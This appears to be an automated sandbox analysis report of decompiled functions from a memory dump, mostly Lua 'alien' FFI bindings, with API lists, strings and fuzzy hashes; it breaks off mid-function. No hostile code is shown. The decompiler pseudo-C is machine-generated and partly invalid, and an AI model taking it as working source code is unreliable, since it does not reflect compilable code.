API ID: L_argerror.$lua_pushstring.lua_tolstring.$lua_gettable.lua_isstring.$L_typerror.htonllua_pushnil.lua_type.lua_typename.
String ID: interface$invalid 'interface' ip address$invalid 'multiaddr' ip address$multiaddr$string 'interface' field expected$string 'multiaddr' field expected
API String ID: 517398875-1578488953
Opcode ID: da43c0ddcc379858874c0060f66a87e07388bea767c832d3849db0e356dc722b
Instruction ID: 44558fa1166cd6b839ad640b5690a938a524cde50b950daaf2412350a4339152
Opcode Fuzzy Hash: da43c0ddcc379858874c0060f66a87e07388bea767c832d3849db0e356dc722b
Instruction Fuzzy Hash: 7131C5A2A8A21136ED127B2C7C13F9F378D4FB6715F140720F954A62C2F655D70A41BA

Uniqueness

Uniqueness Score: -1.00%

Function 00A23230, Relevance: 40.3, APIs: 17, Strings: 6, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00A23230(void* __esi) {

				_push("alien_callback");
				L00A23FAA();
				_push(7);
				_push("__index");
				L00A23FC8();
				_push(0);
				_push(0);
				L00A23FBC();
				_push(5);
				_push("types");
				L00A23FC8();
				_push(0);
				_push(E00A21B60);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xfffffffd);
				L00A23FDA();
				_push(6);
				_push("__call");
				L00A23FC8();
				_push(0);
				_push(E00A21EF0);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(4);
				_push("__gc");
				L00A23FC8();
				_push(0);
				_push(E00A229E0);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xa);
				_push("__tostring");
				L00A23FC8();
				_push(0);
				_push(E00A21E70);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xfffffffe);
				L00A23EF6();
				return 0;
			}

0x00a23230
0x00a23236
0x00a2323b
0x00a2323d
0x00a23243
0x00a23248
0x00a2324a
0x00a2324d
0x00a23252
0x00a23254
0x00a2325a
0x00a2325f
0x00a23261
0x00a23267
0x00a2326c
0x00a2326f
0x00a23277
0x00a2327a
0x00a2327f
0x00a23281
0x00a23287
0x00a2328c
0x00a2328e
0x00a23294
0x00a23299
0x00a2329c
0x00a232a1
0x00a232a3
0x00a232a9
0x00a232ae
0x00a232b0
0x00a232b6
0x00a232be
0x00a232c1
0x00a232c6
0x00a232c8
0x00a232ce
0x00a232d3
0x00a232d5
0x00a232db
0x00a232e0
0x00a232e3
0x00a232e8
0x00a232eb
0x00a232f5

APIs

luaL_newmetatable.LUA5.1(?,alien_callback,00A23E6F), ref: 00A23236
lua_pushlstring.LUA5.1(?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A23243
lua_createtable.LUA5.1(?,00000000,00000000,?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A2324D
lua_pushlstring.LUA5.1(?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A2325A
lua_pushcclosure.LUA5.1(?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_callback,00A23E6F), ref: 00A23267
lua_settable.LUA5.1(?,000000FD,?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_callback), ref: 00A2326F
lua_settable.LUA5.1(?,000000FD), ref: 00A2327A
lua_pushlstring.LUA5.1(?,__call,00000006,?,000000FD), ref: 00A23287
lua_pushcclosure.LUA5.1(?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23294
lua_settable.LUA5.1(?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A2329C
lua_pushlstring.LUA5.1(?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A232A9
lua_pushcclosure.LUA5.1(?,00A229E0,00000000,?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A232B6
lua_settable.LUA5.1(?,000000FD), ref: 00A232C1
lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD), ref: 00A232CE
lua_pushcclosure.LUA5.1(?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A232DB
lua_settable.LUA5.1(?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A232E3
lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A232EB

Strings

__index, xrefs: 00A2323D
__call, xrefs: 00A23281
__tostring, xrefs: 00A232C8
types, xrefs: 00A23254
alien_callback, xrefs: 00A23230
__gc, xrefs: 00A232A3

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushlstring.lua_settable.$lua_pushcclosure.$L_newmetatable.lua_createtable.lua_settop.
String ID: __call$__gc$__index$__tostring$alien_callback$types
API String ID: 863327555-901320719
Opcode ID: f4d59d67e311ada48c072676ecf7ddebfa05e4254c699f4aff4b0b854b28ea63
Instruction ID: eada8bc75b2fc4ae66ba8989f7c7c18ed931308e891c55c48c240c74a36bbf2c
Opcode Fuzzy Hash: f4d59d67e311ada48c072676ecf7ddebfa05e4254c699f4aff4b0b854b28ea63
Instruction Fuzzy Hash: B601E962FCEB3631EC12722D3F47F9E04692F23B61E250B20F525385D65A9D671250AE

Uniqueness

Uniqueness Score: -1.00%

Function 00A23300, Relevance: 40.3, APIs: 17, Strings: 6, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00A23300(void* __esi) {

				_push("alien_function");
				L00A23FAA();
				_push(7);
				_push("__index");
				L00A23FC8();
				_push(0);
				_push(0);
				L00A23FBC();
				_push(5);
				_push("types");
				L00A23FC8();
				_push(0);
				_push(E00A21B60);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xfffffffd);
				L00A23FDA();
				_push(6);
				_push("__call");
				L00A23FC8();
				_push(0);
				_push(E00A21EF0);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(4);
				_push("__gc");
				L00A23FC8();
				_push(0);
				_push(E00A22970);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xa);
				_push("__tostring");
				L00A23FC8();
				_push(0);
				_push(E00A21E70);
				L00A23FE0();
				_push(0xfffffffd);
				L00A23FDA();
				_push(0xfffffffe);
				L00A23EF6();
				return 0;
			}

0x00a23300
0x00a23306
0x00a2330b
0x00a2330d
0x00a23313
0x00a23318
0x00a2331a
0x00a2331d
0x00a23322
0x00a23324
0x00a2332a
0x00a2332f
0x00a23331
0x00a23337
0x00a2333c
0x00a2333f
0x00a23347
0x00a2334a
0x00a2334f
0x00a23351
0x00a23357
0x00a2335c
0x00a2335e
0x00a23364
0x00a23369
0x00a2336c
0x00a23371
0x00a23373
0x00a23379
0x00a2337e
0x00a23380
0x00a23386
0x00a2338e
0x00a23391
0x00a23396
0x00a23398
0x00a2339e
0x00a233a3
0x00a233a5
0x00a233ab
0x00a233b0
0x00a233b3
0x00a233b8
0x00a233bb
0x00a233c5

APIs

luaL_newmetatable.LUA5.1(?,alien_function,00A23E74), ref: 00A23306
lua_pushlstring.LUA5.1(?,__index,00000007,?,alien_function,00A23E74), ref: 00A23313
lua_createtable.LUA5.1(?,00000000,00000000,?,__index,00000007,?,alien_function,00A23E74), ref: 00A2331D
lua_pushlstring.LUA5.1(?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_function,00A23E74), ref: 00A2332A
lua_pushcclosure.LUA5.1(?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_function,00A23E74), ref: 00A23337
lua_settable.LUA5.1(?,000000FD,?,00A21B60,00000000,?,types,00000005,?,00000000,00000000,?,__index,00000007,?,alien_function), ref: 00A2333F
lua_settable.LUA5.1(?,000000FD), ref: 00A2334A
lua_pushlstring.LUA5.1(?,__call,00000006,?,000000FD), ref: 00A23357
lua_pushcclosure.LUA5.1(?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23364
lua_settable.LUA5.1(?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A2336C
lua_pushlstring.LUA5.1(?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23379
lua_pushcclosure.LUA5.1(?,00A22970,00000000,?,__gc,00000004,?,000000FD,?,00A21EF0,00000000,?,__call,00000006,?,000000FD), ref: 00A23386
lua_settable.LUA5.1(?,000000FD), ref: 00A23391
lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD), ref: 00A2339E
lua_pushcclosure.LUA5.1(?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A233AB
lua_settable.LUA5.1(?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A233B3
lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00A21E70,00000000,?,__tostring,0000000A,?,000000FD), ref: 00A233BB

Strings

__index, xrefs: 00A2330D
__call, xrefs: 00A23351
__tostring, xrefs: 00A23398
alien_function, xrefs: 00A23300
types, xrefs: 00A23324
__gc, xrefs: 00A23373

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushlstring.lua_settable.$lua_pushcclosure.$L_newmetatable.lua_createtable.lua_settop.
String ID: __call$__gc$__index$__tostring$alien_function$types
API String ID: 863327555-781758760
Opcode ID: 4386beff59060f69bd7f2ad110b811b7c5a6aeac3166f816163e4d1ea9700d39
Instruction ID: e9ceb689d6eff0f23cb51611f4eb1c205cee5c18519bb2a6de4f2978ca9a44fc
Opcode Fuzzy Hash: 4386beff59060f69bd7f2ad110b811b7c5a6aeac3166f816163e4d1ea9700d39
Instruction Fuzzy Hash: 7C01D362FCAB3631EC12722D3F47F9E04692F23B61E250B20F525385D66A9D631250AE

Uniqueness

Uniqueness Score: -1.00%

Function 10015AE0, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E10015AE0(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v516;
				void* _v1040;
				char _v1044;
				char _v1048;
				char _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				void* _t57;
				signed int _t79;
				intOrPtr _t99;
				intOrPtr* _t105;
				intOrPtr* _t107;
				char* _t108;
				signed int _t110;
				void* _t113;
				void* _t115;
				void* _t123;

				_t123 = __fp0;
				_t72 = _a4;
				_t99 = 1;
				_t105 = E1000F4A0(__eflags, _a4, 1,  &_v1048);
				_v1080 = _v1048 + _t105;
				E1000FC00(_t72,  &_v1040);
				_t113 = (_t110 & 0xfffffff8) - 0x434 + 0x14;
				if(_t105 >= _v1080) {
					L21:
					E1000FB40( &_v1040);
					return 1;
				} else {
					do {
						if( *_t105 == 0x25) {
							_t107 = _t105 + 1;
							__eflags =  *((intOrPtr*)(_t105 + 1)) - 0x25;
							if( *((intOrPtr*)(_t105 + 1)) != 0x25) {
								_v1072 = _t99 + 1;
								_t108 = E10015EF0(_t72, _t107,  &_v1068);
								_t115 = _t113 + 0xc;
								_t57 =  *_t108 - 0x45;
								_t105 = _t108 + 1;
								__eflags = _t57 - 0x33;
								if(__eflags > 0) {
									L22:
									return E1000F230(_t72, "invalid option \'%%%c\' to \'format\'",  *((char*)(_t105 - 1)));
								} else {
									_t22 = _t57 + 0x10015d40; // 0x4c483ff
									_t79 =  *_t22;
									switch( *((intOrPtr*)(0 +  &M10015D28))) {
										case 0:
											__eax = E1000F540(__ebx, __eflags, __fp0, __ebx, __edi);
											 *__esp = __fp0;
											__ecx =  &_v1068;
											__eax = sprintf( &_v516,  &_v1068);
											goto L19;
										case 1:
											E10016070( &_v1068,  &_v1068) = E1000F540(__ebx, __eflags, __fp0, __ebx, __edi);
											L10016E30();
											 &_v516 = sprintf( &_v516,  &_v1068,  &_v516);
											goto L19;
										case 2:
											_t60 = E1000F540(_t72, __eflags, _t123, _t72, _t101);
											L10016E30();
											sprintf( &_v516,  &_v1068, _t60);
											_t117 = _t115 + 0x14;
											goto L19;
										case 3:
											 &_v1040 = E10015D80(__eflags, __ebx,  &_v1040, __edi);
											goto L20;
										case 4:
											__ecx =  &_v1044;
											_v1076 = E1000F4A0(__eflags, __ebx, __edi,  &_v1044);
											__eax = strchr( &_v1068, 0x2e);
											__eflags = __eax;
											if(__eax != 0) {
												L18:
												__ecx = _v1076;
												 &_v516 = sprintf( &_v516,  &_v1068, _v1076);
												L19:
												asm("repne scasb");
												_t82 =  !(_t79 | 0xffffffff) - 1;
												__eflags =  !(_t79 | 0xffffffff) - 1;
												E1000FAC0( &_v1040,  &_v516, _t82);
												_t99 = _v1072;
												_t113 = _t117 + 0xc;
											} else {
												__eflags = _v1044 - 0x64;
												if(__eflags < 0) {
													goto L18;
												} else {
													E100013D0(__eflags, __ebx, __edi) =  &_v1040;
													__eax = E1000FB70(__esi, __eflags,  &_v1040);
												}
											}
											goto L20;
										case 5:
											goto L22;
									}
								}
							} else {
								__eflags = _v1040 -  &_v516;
								if(__eflags >= 0) {
									E1000F9E0(__eflags,  &_v1040);
									_t113 = _t113 + 4;
								}
								 *_v1040 =  *_t107;
								_t105 = _t107 + 1;
								_v1040 = _v1040 + 1;
								goto L20;
							}
						} else {
							_t121 = _v1040 -  &_v516;
							if(_v1040 >=  &_v516) {
								E1000F9E0(_t121,  &_v1040);
								_t113 = _t113 + 4;
							}
							 *_v1040 =  *_t105;
							_t105 = _t105 + 1;
							_v1040 = _v1040 + 1;
							goto L20;
						}
						goto L23;
						L20:
					} while (_t105 < _v1080);
					goto L21;
				}
				L23:
			}

0x10015ae0
0x10015aed
0x10015af6
0x10015b07
0x10015b11
0x10015b15
0x10015b1e
0x10015b23
0x10015cf2
0x10015cf7
0x10015d0a
0x10015b29
0x10015b29
0x10015b2c
0x10015b64
0x10015b65
0x10015b67
0x10015ba4
0x10015bad
0x10015baf
0x10015bb5
0x10015bb8
0x10015bb9
0x10015bbc
0x10015d0b
0x10015d24
0x10015bc2
0x10015bc4
0x10015bc4
0x10015bca
0x00000000
0x10015c2d
0x10015c32
0x10015c35
0x10015c42
0x00000000
0x00000000
0x10015c05
0x10015c0a
0x10015c1d
0x00000000
0x00000000
0x10015bd3
0x10015bd8
0x10015beb
0x10015bf1
0x00000000
0x00000000
0x10015c54
0x00000000
0x00000000
0x10015c61
0x10015c74
0x10015c78
0x10015c81
0x10015c83
0x10015ca2
0x10015ca2
0x10015cb4
0x10015cbd
0x10015ccd
0x10015cd1
0x10015cd1
0x10015cdc
0x10015ce1
0x10015ce5
0x10015c85
0x10015c85
0x10015c8a
0x00000000
0x10015c8c
0x10015c93
0x10015c98
0x10015c9d
0x10015c8a
0x00000000
0x00000000
0x00000000
0x00000000
0x10015bca
0x10015b69
0x10015b74
0x10015b76
0x10015b7d
0x10015b82
0x10015b82
0x10015b8b
0x10015b92
0x10015b93
0x00000000
0x10015b93
0x10015b2e
0x10015b39
0x10015b3b
0x10015b42
0x10015b47
0x10015b47
0x10015b50
0x10015b57
0x10015b58
0x00000000
0x10015b58
0x00000000
0x10015ce8
0x10015ce8
0x00000000
0x10015b29
0x00000000

APIs

luaL_checklstring.LUA5.1(?,00000001,?), ref: 10015AFE

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_buffinit.LUA5.1(?,?,?,00000001,?), ref: 10015B15
luaL_prepbuffer.LUA5.1(?), ref: 10015B42

Part of subcall function 10015EF0: strchr.MSVCRT ref: 10015F0F
Part of subcall function 10015EF0: luaL_error.LUA5.1(?,invalid format (repeated flags),00000002,00000001,?,?,10015BAD,?,00000001,?), ref: 10015F33
Part of subcall function 10015EF0: _isctype.MSVCRT ref: 10015F53
Part of subcall function 10015EF0: _isctype.MSVCRT ref: 10015F83
Part of subcall function 10015EF0: _isctype.MSVCRT ref: 10015FB8
Part of subcall function 10015EF0: _isctype.MSVCRT ref: 10015FE7
Part of subcall function 10015EF0: _isctype.MSVCRT ref: 10016017
Part of subcall function 10015EF0: luaL_error.LUA5.1(?,invalid format (width or precision too long),00000002,00000001,?,?,10015BAD,?,00000001,?), ref: 1001603A

luaL_prepbuffer.LUA5.1(?), ref: 10015B7D
luaL_checknumber.LUA5.1(?,?), ref: 10015BD3
_ftol.MSVCRT ref: 10015BD8
sprintf.MSVCRT ref: 10015BEB
luaL_checknumber.LUA5.1(?,?,?), ref: 10015C05
_ftol.MSVCRT ref: 10015C0A
sprintf.MSVCRT ref: 10015C1D
luaL_checknumber.LUA5.1(?,00000002), ref: 10015C2D
sprintf.MSVCRT ref: 10015C42
luaL_checklstring.LUA5.1(?,?,?), ref: 10015C68
strchr.MSVCRT ref: 10015C78
lua_pushvalue.LUA5.1(?,?), ref: 10015C8E
luaL_addvalue.LUA5.1(?,?,?), ref: 10015C98
luaL_addlstring.LUA5.1(?,?), ref: 10015CDC
luaL_pushresult.LUA5.1(?), ref: 10015CF7
luaL_error.LUA5.1(?,invalid option '%%%c' to 'format',?), ref: 10015D16

Strings

invalid option '%%%c' to 'format', xrefs: 10015D10
d, xrefs: 10015C85

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _isctype$L_checknumber.L_error.sprintf$L_checklstring.L_prepbuffer._ftolstrchr$L_addlstring.L_addvalue.L_buffinit.L_pushresult.lua_pushvalue.lua_tolstring.
String ID: d$invalid option '%%%c' to 'format'
API String ID: 1960201620-813261871
Opcode ID: e116f2b5f62d8e48b2d6848ca4e690ed919ed90517299e3cb23da36ac54c313e
Instruction ID: a4bc58ddc973c009b8fe134d9058b0f7e4ee088237d879e27fdc7f3a3a6b70c3
Opcode Fuzzy Hash: e116f2b5f62d8e48b2d6848ca4e690ed919ed90517299e3cb23da36ac54c313e
Instruction Fuzzy Hash: 6051B6B5408340ABD324DB64DC85DAFBBE8FFC5745F44091DF98A8B142E631E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A22F20, Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 214
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00A22F20(void* __fp0, intOrPtr _a4) {
				signed int _v8;
				signed int _v10;
				void* __ebx;
				signed int __esi;
				void* _t27;
				signed int _t28;
				signed int _t29;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				void* _t46;

				_t46 = __fp0;
				_t37 = _a4;
				_t28 = E00A21110(_t27, 1, _t37, "alien_buffer");
				_t34 = _t28;
				_t39 = _t38 + 4;
				if(_t34 == 0) {
					_push("alien buffer expected");
					_push(1);
					_push(_t37);
					L00A23F14();
					_t39 = _t39 + 0xc;
				}
				_push(2);
				_push(_t37);
				L00A23FCE();
				_push(0xa255f0);
				_push("char");
				_push(4);
				_push(_t37);
				_t36 = _t28 - 1;
				L00A23F98();
				_t29 =  *(0xa255a8 + _t28 * 4);
				if(_t29 > 0x11) {
					L19:
					_push("alien: unknown type in buffer:put");
					_push(_t37);
					L00A23F26();
					return 0;
				} else {
					switch( *((intOrPtr*)(_t29 * 4 +  &M00A23150))) {
						case 0:
							_push(3);
							_push(_t37);
							L00A23F68();
							 *((short*)(_t34 + _t36)) = E00A245C0(_t29, _t46);
							return 0;
							goto L20;
						case 1:
							_push(3);
							_push(__esi);
							L00A23F68();
							asm("fnstcw word [esp+0x16]");
							_v10 & 0x0000ffff = _v10 & 0x0000ffff | 0x00000c00;
							_v8 = _v10 & 0x0000ffff | 0x00000c00;
							__esp = __esp + 8;
							asm("fldcw word [esp+0x10]");
							asm("fistp dword [esp+0x10]");
							 *(__ebx + __edi) = _v8;
							asm("fldcw word [esp+0xa]");
							__eax = 0;
							return 0;
							goto L20;
						case 2:
							_push(3);
							_push(__esi);
							L00A23F68();
							__esp = __esp + 8;
							 *(__ebx + __edi) = __eax;
							__eax = 0;
							return 0;
							goto L20;
						case 3:
							_push(3);
							_push(__esi);
							L00A23F68();
							asm("fnstcw word [esp+0x16]");
							_v10 & 0x0000ffff = _v10 & 0x0000ffff | 0x00000c00;
							_v8 = _v10 & 0x0000ffff | 0x00000c00;
							__esp = __esp + 8;
							__eax = 0;
							asm("fldcw word [esp+0x10]");
							asm("fistp qword [esp+0x10]");
							__ecx = _v8;
							 *(__ebx + __edi) = _v8;
							asm("fldcw word [esp+0xa]");
							return 0;
							goto L20;
						case 4:
							_push(3);
							_push(__esi);
							L00A23F68();
							asm("fnstcw word [esp+0x16]");
							_v10 & 0x0000ffff = _v10 & 0x0000ffff | 0x00000c00;
							_v8 = _v10 & 0x0000ffff | 0x00000c00;
							__esp = __esp + 8;
							__eax = 0;
							asm("fldcw word [esp+0x10]");
							asm("fistp qword [esp+0x10]");
							 *(__ebx + __edi) = _v8;
							asm("fldcw word [esp+0xa]");
							return 0;
							goto L20;
						case 5:
							goto L19;
						case 6:
							_push(3);
							_push(__esi);
							L00A23F68();
							 *(__ebx + __edi) = __fp0;
							__esp = __esp + 8;
							__eax = 0;
							return 0;
							goto L20;
						case 7:
							_push(3);
							_push(__esi);
							L00A23F68();
							 *(__ebx + __edi) = __fp0;
							__esp = __esp + 8;
							__eax = 0;
							return 0;
							goto L20;
						case 8:
							_push(3);
							_push(__esi);
							L00A23F62();
							__esp = __esp + 8;
							 *(__ebx + __edi) = __al;
							__eax = 0;
							return 0;
							goto L20;
						case 9:
							_push(3);
							_push(__esi);
							L00A23F4A();
							__esp = __esp + 8;
							if(__eax != 0) {
								goto L14;
							} else {
								goto L13;
							}
							goto L20;
						case 0xa:
							_push(3);
							_push(__esi);
							L00A23F4A();
							__esp = __esp + 8;
							if(__eax == 0) {
								L13:
								__eax = 0;
								 *(__ebx + __edi) = 0;
								return 0;
							} else {
								_push(3);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								if(__eax == 0) {
									L14:
									_push(0);
									_push(3);
									_push(__esi);
									L00A23F5C();
									__esp = __esp + 0xc;
									 *(__ebx + __edi) = __eax;
									__eax = 0;
									return 0;
								} else {
									_push(3);
									_push(__esi);
									L00A23F0E();
									__esp = __esp + 8;
									 *(__ebx + __edi) = __eax;
									__eax = 0;
									return 0;
								}
							}
							goto L20;
						case 0xb:
							__eax = 3;
							__ecx = __esi;
							 *(__ebx + __edi) = E00A21170(3, __esi);
							__eax = 0;
							return 0;
							goto L20;
					}
				}
				L20:
			}

0x00a22f20
0x00a22f25
0x00a22f34
0x00a22f39
0x00a22f3b
0x00a22f40
0x00a22f42
0x00a22f47
0x00a22f49
0x00a22f4a
0x00a22f4f
0x00a22f4f
0x00a22f52
0x00a22f54
0x00a22f55
0x00a22f5a
0x00a22f5f
0x00a22f66
0x00a22f68
0x00a22f69
0x00a22f6c
0x00a22f71
0x00a22f7e
0x00a23137
0x00a23137
0x00a2313c
0x00a2313d
0x00a2314d
0x00a22f84
0x00a22f84
0x00000000
0x00a22f8b
0x00a22f8d
0x00a22f8e
0x00a22f9b
0x00a22fa7
0x00000000
0x00000000
0x00a22fc4
0x00a22fc6
0x00a22fc7
0x00a22fcc
0x00a22fd5
0x00a22fda
0x00a22fde
0x00a22fe1
0x00a22fe5
0x00a22fee
0x00a22ff3
0x00a22ff8
0x00a22ffe
0x00000000
0x00000000
0x00a22fa8
0x00a22faa
0x00a22fab
0x00a22fb0
0x00a22fb8
0x00a22fbd
0x00a22fc3
0x00000000
0x00000000
0x00a22fff
0x00a23001
0x00a23002
0x00a23007
0x00a23010
0x00a23015
0x00a23019
0x00a2301c
0x00a2301e
0x00a23022
0x00a23026
0x00a2302a
0x00a2302e
0x00a23037
0x00000000
0x00000000
0x00a23038
0x00a2303a
0x00a2303b
0x00a23040
0x00a23049
0x00a2304e
0x00a23052
0x00a23055
0x00a23057
0x00a2305b
0x00a23063
0x00a23067
0x00a23070
0x00000000
0x00000000
0x00000000
0x00000000
0x00a23088
0x00a2308a
0x00a2308b
0x00a23090
0x00a23093
0x00a23098
0x00a2309e
0x00000000
0x00000000
0x00a2309f
0x00a230a1
0x00a230a2
0x00a230a7
0x00a230aa
0x00a230af
0x00a230b5
0x00000000
0x00000000
0x00a23071
0x00a23073
0x00a23074
0x00a23079
0x00a2307c
0x00a23081
0x00a23087
0x00000000
0x00000000
0x00a230b6
0x00a230b8
0x00a230b9
0x00a230be
0x00a230c3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a23102
0x00a23104
0x00a23105
0x00a2310a
0x00a2310f
0x00a230c5
0x00a230c5
0x00a230c7
0x00a230d0
0x00a23111
0x00a23111
0x00a23113
0x00a23114
0x00a23119
0x00a2311e
0x00a230d1
0x00a230d1
0x00a230d3
0x00a230d5
0x00a230d6
0x00a230db
0x00a230de
0x00a230e3
0x00a230e9
0x00a23120
0x00a23120
0x00a23122
0x00a23123
0x00a23128
0x00a2312b
0x00a23130
0x00a23136
0x00a23136
0x00a2311e
0x00000000
0x00000000
0x00a230ea
0x00a230ef
0x00a230f6
0x00a230fb
0x00a23101
0x00000000
0x00000000
0x00a22f84
0x00000000

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien buffer expected), ref: 00A22F4A
luaL_checkinteger.LUA5.1(?,00000002), ref: 00A22F55
luaL_checkoption.LUA5.1(?,00000004,char,00A255F0,?,00000002), ref: 00A22F6C
lua_tonumber.LUA5.1(?,00000003), ref: 00A22F8E

Strings

alien_buffer, xrefs: 00A22F2A
alien buffer expected, xrefs: 00A22F42
alien: unknown type in buffer:put, xrefs: 00A23137
char, xrefs: 00A22F5F

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checkinteger.L_checkoption.lua_getfield.lua_getmetatable.lua_rawequal.lua_settop.lua_tonumber.lua_touserdata.
String ID: alien buffer expected$alien: unknown type in buffer:put$alien_buffer$char
API String ID: 19568338-330609386
Opcode ID: 08ae61a9313a59dc5beff87e440d234306e450ea96f6c86c729f32e45a6850ec
Instruction ID: 0e94da867cb5d8c9dd172ce6fdaf15623f93ca3f0dfd37375a8eb00d081c773d
Opcode Fuzzy Hash: 08ae61a9313a59dc5beff87e440d234306e450ea96f6c86c729f32e45a6850ec
Instruction Fuzzy Hash: 0A519426A4832566DB10AFADBD427DE3394EF81721F940879FD4489281F32D871E86F3

Uniqueness

Uniqueness Score: -1.00%

Function 00991650, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00991650(intOrPtr __eax, long long __fp0, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t17;
				intOrPtr* _t18;
				intOrPtr* _t20;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				signed int _t38;
				void* _t41;
				void* _t42;
				long long* _t44;
				long long* _t46;
				long long _t53;

				_t53 = __fp0;
				_t36 = _a4;
				_push(0);
				_push(0);
				_push(_t36);
				L00994ACA();
				_push(_t36);
				L00994B60();
				_push("name");
				_push(_t36);
				_v8 = __eax;
				L00994AD0();
				_t20 = _a8;
				_t17 =  *_t20;
				_push(_t17);
				_push(_t36);
				L00994AD0();
				_push(__eax);
				_push(_t36);
				L00994B42();
				_push("ip");
				_push(_t36);
				L00994AD0();
				_push("alias");
				_push(_t36);
				L00994AD0();
				_t32 =  *((intOrPtr*)(_t20 + 4));
				_push(0);
				_push(0);
				_push(_t36);
				_v12 = 1;
				L00994ACA();
				_t41 = (_t38 & 0xfffffff8) - 0xc + 0x44;
				if(_t32 != 0 &&  *_t32 != 0) {
					do {
